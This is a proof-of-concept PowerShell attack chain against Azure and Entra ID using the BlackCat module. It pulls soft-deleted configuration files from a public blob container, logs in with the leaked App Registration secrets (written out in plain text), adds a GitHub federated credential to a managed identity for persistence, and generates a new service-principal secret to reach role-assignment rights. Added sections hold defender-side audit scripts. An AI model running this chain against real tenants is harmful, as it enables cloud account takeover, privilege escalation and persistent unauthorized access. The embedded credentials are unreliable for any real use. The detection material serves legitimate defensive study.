This script demonstrates a practical proof-of-concept for an attack that:
- Uses a compromised App Registration to restore a deleted privileged App
- Uses that privileged App to clone a high-privilege user
- Authenticates with the new cloned user

Prerequisites:
- PowerShell 7.x
- Az PowerShell module
- Microsoft.Graph PowerShell module
- BlackCat module
- Compromised App Registration credentials with appropriate permissions

Setup:
- Open a terminal
- Import-Module BlackCat.psm1
# Show commands
Show-BlackCatCommands -Category Reconnaissance
Find-AzurePublicResource -Name bluemountainbank
Find-PublicStorageContainer -StorageAccountName bluemountainbankbackup -IncludeEmpty
# Show that the container looks empty (no live blobs)
Get-PublicBlobContent -BlobUrl 'https://bluemountainbankbackup.blob.core.windows.net/config/?restype=container&comp=list' -ListOnly
# Show soft-deleted items
Get-PublicBlobContent -BlobUrl 'https://bluemountainbankbackup.blob.core.windows.net/config/?restype=container&comp=list' -IncludeDeleted -ListOnly
# Download the deleted file(s) to the current directory
Get-PublicBlobContent -BlobUrl 'https://bluemountainbankbackup.blob.core.windows.net/config/?restype=container&comp=list' -IncludeDeleted -OutputPath .

We now have a file.
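The step above works because the container is anonymously listable and blob soft delete keeps the "deleted" JSON around. The following is an added defender-side example, not part of the original demo or the BlackCat project: it walks every storage account in the current subscription with the Az modules, reports containers that allow anonymous access together with any soft-deleted blobs still sitting in them, and optionally turns anonymous access off at the account level. It assumes Az.Accounts and Az.Storage are installed and Connect-AzAccount has already been run; the function name Find-AnonymousContainer is my own.

```powershell
# Added example (not from the original script or BlackCat): find anonymously
# readable containers and the soft-deleted blobs they still expose.
# Assumes Az.Accounts + Az.Storage and an existing Connect-AzAccount session.
function Find-AnonymousContainer {
    [CmdletBinding()]
    param(
        # When set, disable anonymous blob access on every affected account.
        [switch]$Remediate
    )

    $findings = @()
    foreach ($account in Get-AzStorageAccount) {
        # $null means the property was not returned; treat that as "allowed"
        # so the account is still inspected.
        $publicAllowed = $account.AllowBlobPublicAccess -ne $false
        if (-not $publicAllowed) { continue }

        $ctx = $account.Context
        foreach ($container in Get-AzStorageContainer -Context $ctx) {
            # PublicAccess is Off, Blob or Container; only Container allows listing.
            if ($container.PublicAccess -eq 'Off') { continue }

            # Soft-deleted blobs remain listable through include=deleted,
            # which is exactly what the demo above relied on.
            $deleted = Get-AzStorageBlob -Container $container.Name -Context $ctx -IncludeDeleted |
                Where-Object { $_.IsDeleted }

            $findings += [pscustomobject]@{
                StorageAccount = $account.StorageAccountName
                ResourceGroup  = $account.ResourceGroupName
                Container      = $container.Name
                PublicAccess   = $container.PublicAccess
                DeletedBlobs   = @($deleted).Count
                DeletedNames   = (@($deleted) | ForEach-Object Name) -join ', '
            }
        }

        if ($Remediate) {
            # Account-level switch overrides per-container PublicAccess settings.
            Set-AzStorageAccount -ResourceGroupName $account.ResourceGroupName `
                -Name $account.StorageAccountName -AllowBlobPublicAccess $false | Out-Null
        }
    }
    return $findings
}

Find-AnonymousContainer | Format-Table -AutoSize
```

Run it once without -Remediate to review the list; a non-zero DeletedBlobs count on a public container is the condition that leaks "deleted" configuration files like the one retrieved above.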
# Let's check the content
$content = Get-Content ./azure-ad-app-registrations.json | ConvertFrom-Json
$content.appRegistrations
# Compromised App Registration credentials (taken from the last entry in the file)
$tenantId = $content.appRegistrations[-1].tenantId
$clientId = $content.appRegistrations[-1].appId
$appSecret = $content.appRegistrations[-1].SecretValue
# Or set them directly
$tenantId = '3da86d62-c862-48da-973f-487ab98166a8'
$clientId = '0c3be057-9e1d-4b72-bf5d-555d396fee14'
$appSecret = '46Q8Q~dF1cWE5_yIFuaui8mI6iULXQHK-oFxfbs~'
# Authenticate
Connect-ServicePrincipal -TenantId $tenantId -ClientId $clientId -ClientSecret $appSecret
Get-RoleAssignment -CurrentUser -OutputFormat Object
# Get Entra information
$users = Invoke-MsGraph -relativeUrl 'users' -verbose
# Show Caching
$users = Invoke-MsGraph -relativeUrl 'users' -verbose
Get-PrivilegedApp

We now know that we have Contributor permissions on the UAMI.
$parameters = @{
id = '/subscriptions/f6426b36-04fa-4a41-a9e4-7f13abe34d55/resourceGroups/bluemountain-banking-dev/providers/Microsoft.ManagedIdentity/userAssignedIdentities/id-bmb-rbac-dev'
GitHubOrganization = 'azurekid'
GitHubRepository = 'blackcat'
Branch = 'main'
Name = 'mc2mc'
}
Set-FederatedIdentity @parameters | Format-List *

Clone the repository of the organization (if public). We are now going to run a GitHub Action using the Managed Identity.
This uses a GitHub Action that imports the BlackCat module and uses the clone function.
This uses a GitHub Action that imports the BlackCat module and adds a user to a privileged group.
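Set-FederatedIdentity above persists by attaching a GitHub federated credential to the user-assigned managed identity, so the attacker never needs a secret again. The following is an added defender-side example, not part of the original demo or the BlackCat project: it enumerates every federated identity credential on the user-assigned identities in the current subscription with Az.ManagedServiceIdentity, flags any whose issuer or subject is outside an allow-list, and pulls the Activity Log writes that created them with Az.Monitor. The allow-list values, the function names and the contoso-org placeholder are my own assumptions; Connect-AzAccount is assumed to have been run.

```powershell
# Added example (not from the original script or BlackCat): audit federated
# identity credentials on user-assigned managed identities.
# Assumes Az.ManagedServiceIdentity + Az.Monitor and an existing Connect-AzAccount session.
$AllowedIssuers  = @('https://token.actions.githubusercontent.com')
$AllowedSubjects = @('repo:contoso-org/')   # placeholder: your own GitHub org prefix

function Find-SuspiciousFederatedCredential {
    $results = @()
    foreach ($identity in Get-AzUserAssignedIdentity) {
        $creds = Get-AzFederatedIdentityCredential -ResourceGroupName $identity.ResourceGroupName `
                     -IdentityName $identity.Name
        foreach ($cred in $creds) {
            $issuerOk  = $AllowedIssuers -contains $cred.Issuer
            # Subject for GitHub looks like repo:<org>/<repo>:ref:refs/heads/<branch>;
            # anything outside our org prefix is suspicious.
            $subjectOk = [bool]($AllowedSubjects | Where-Object { $cred.Subject.StartsWith($_) })
            $results += [pscustomobject]@{
                Identity   = $identity.Name
                Credential = $cred.Name
                Issuer     = $cred.Issuer
                Subject    = $cred.Subject
                Suspicious = -not ($issuerOk -and $subjectOk)
            }
        }
    }
    return $results
}

# Who created or changed federated credentials recently? The operation name is
# the ARM provider operation written to the Activity Log for FIC writes.
function Get-FederatedCredentialWrite {
    param([int]$Days = 7)
    Get-AzActivityLog -StartTime (Get-Date).AddDays(-$Days) |
        Where-Object { [string]$_.OperationName -like '*userAssignedIdentities/federatedIdentityCredentials/write' } |
        Select-Object EventTimestamp, Caller, ResourceId, Status
}

Find-SuspiciousFederatedCredential | Where-Object Suspicious | Format-Table -AutoSize
Get-FederatedCredentialWrite | Format-Table -AutoSize
```

The Caller in the Activity Log output is the identity that performed the write; a service principal (the compromised App Registration) rather than a named administrator adding a credential that points at a repository outside the organisation is the pattern to alert on.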
$parameters = @{
ObjectId = '0f3acf07-a6f6-43ac-811b-2500df32d0aa'
UseApplicationEndpoint = $true
Action = 'AddPassword'
GenerateSecret = $true
}
Set-ServicePrincipalCredential @parameters
$ClientSecret = '0dP8Q~C7bIW2auZL2NFQRr4~MBItInACg.Yc1c5a'
$clientId = '51c245e2-91c0-4614-b680-b2f48ef7f540'
$tenantId = '3da86d62-c862-48da-973f-487ab98166a8'
# Wrap the secret in a SecureString before building the credential
$SecureStringPwd = ConvertTo-SecureString -String $ClientSecret -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $clientId, $SecureStringPwd
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId

Now that we have Role Assignment permissions, we can become king of the castle!!!
This attack chain demonstrates how an attacker with access to a single set of App Registration credentials can:
- Exploit the recycle bin to recover potentially more powerful applications
- Use those applications to create a highly privileged user account
- Establish persistent access with full administrative rights
- Perform actions as if they were a legitimate administrator
Organizations should regularly audit their deleted applications, implement strict permissions on application restoration capabilities, and monitor for unusual user creation patterns, especially those involving high privilege roles.
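The recommendations above, and the service-principal credential step earlier in the script, map onto three concrete checks. What follows is an added example, not part of the original demo or the BlackCat project, written against the Microsoft.Graph PowerShell SDK that the prerequisites already list: it lists applications currently in the recycle bin, lists members of the roles that can restore applications, and pulls the directory audit events this chain generates (application restore, credential added to a service principal, user created, role or group membership added). It assumes Connect-MgGraph has been run with Application.Read.All, RoleManagement.Read.Directory and AuditLog.Read.All; the function names are mine, and the activity display names are the documented Entra audit-log names, which you should confirm against your own tenant.

```powershell
# Added example (not from the original script or BlackCat): audit checks for
# the attack chain. Assumes an existing Connect-MgGraph session with
# Application.Read.All, RoleManagement.Read.Directory and AuditLog.Read.All.
Import-Module Microsoft.Graph.Authentication

# 1. Applications sitting in the recycle bin (restorable for 30 days).
function Get-DeletedApplication {
    $uri = 'https://graph.microsoft.com/v1.0/directory/deletedItems/microsoft.graph.application'
    (Invoke-MgGraphRequest -Method GET -Uri $uri -OutputType PSObject).value |
        Select-Object displayName, appId, id, deletedDateTime
}

# 2. Who can restore applications: members of the application-admin roles.
function Get-ApplicationAdminMember {
    $roleNames = @('Application Administrator', 'Cloud Application Administrator', 'Global Administrator')
    $roles = (Invoke-MgGraphRequest -Method GET -Uri 'https://graph.microsoft.com/v1.0/directoryRoles' -OutputType PSObject).value |
        Where-Object { $roleNames -contains $_.displayName }
    foreach ($role in $roles) {
        $members = (Invoke-MgGraphRequest -Method GET `
            -Uri "https://graph.microsoft.com/v1.0/directoryRoles/$($role.id)/members" -OutputType PSObject).value
        foreach ($m in $members) {
            # Service principals holding these roles are a restore path for an
            # attacker with that SP's credentials, as in the demo above.
            [pscustomobject]@{ Role = $role.displayName; Member = $m.displayName; Type = $m.'@odata.type'; Id = $m.id }
        }
    }
}

# 3. Audit events produced by the chain, with the initiator type.
function Get-SuspiciousDirectoryAudit {
    param([int]$Days = 7)
    $since = (Get-Date).ToUniversalTime().AddDays(-$Days).ToString('yyyy-MM-ddTHH:mm:ssZ')
    # Activity display names as documented for Entra audit logs; verify in-tenant.
    $activities = @('Restore application', 'Add service principal credentials', 'Add user',
                    'Add member to role', 'Add member to group')
    $uri = "https://graph.microsoft.com/v1.0/auditLogs/directoryAudits?`$filter=activityDateTime ge $since"
    $events = @()
    while ($uri) {                       # follow @odata.nextLink paging
        $page = Invoke-MgGraphRequest -Method GET -Uri $uri -OutputType PSObject
        $events += $page.value
        $uri = $page.'@odata.nextLink'
    }
    $events | Where-Object { $activities -contains $_.activityDisplayName } | ForEach-Object {
        $byApp = [bool]$_.initiatedBy.app
        $who   = if ($byApp) { $_.initiatedBy.app.displayName } else { $_.initiatedBy.user.userPrincipalName }
        [pscustomobject]@{
            Time      = $_.activityDateTime
            Activity  = $_.activityDisplayName
            Initiator = $who
            # A user or role change initiated by an application rather than an
            # interactive admin is the signal for this chain.
            ByApp     = $byApp
            Target    = ($_.targetResources | ForEach-Object displayName) -join ', '
        }
    }
}

Get-DeletedApplication        | Format-Table -AutoSize
Get-ApplicationAdminMember    | Format-Table -AutoSize
Get-SuspiciousDirectoryAudit  | Where-Object ByApp | Format-Table -AutoSize
```

Feeding the third function's ByApp rows into an alert, and reviewing the second function's output for service principals that hold application-admin roles, addresses the two gaps the chain depends on: an unmonitored restore of a deleted application and a user creation that no human performed.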